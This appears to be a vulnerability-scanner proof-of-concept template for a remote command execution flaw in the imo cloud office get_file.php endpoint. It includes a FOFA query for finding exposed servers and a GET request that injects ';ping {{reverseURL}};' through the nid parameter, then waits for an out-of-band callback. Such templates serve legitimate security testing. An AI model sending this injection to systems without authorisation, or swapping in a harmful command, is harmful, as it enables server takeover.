id: imo-get-file-rce

info:
  name: imo 云办公室 get_file.php 远程命令执行漏洞
  author: daffainfo
  severity: critical
  verified: false
  description: |
    imo云办公室由上海易睦网络科技有限公司于2007年创立，总部位于上海，imo云办公室管理运营企业即时通讯平台imo，包括对imo的在线支持，故障处理，客户服务等，对imo进行持续研发，提供在线升级等。imo云办公室系统 get_file.php 存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。
    fofa-query: app="iMO-云办公室"
  reference:
    - https://mp.weixin.qq.com/s/zW8oOiILwT4mywsrMJN1fQ

set:
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /file/NDisk/get_file.php?cid=1&nid=;ping%20{{reverseURL}};
    expression: reverse.wait(5)
expression: r0()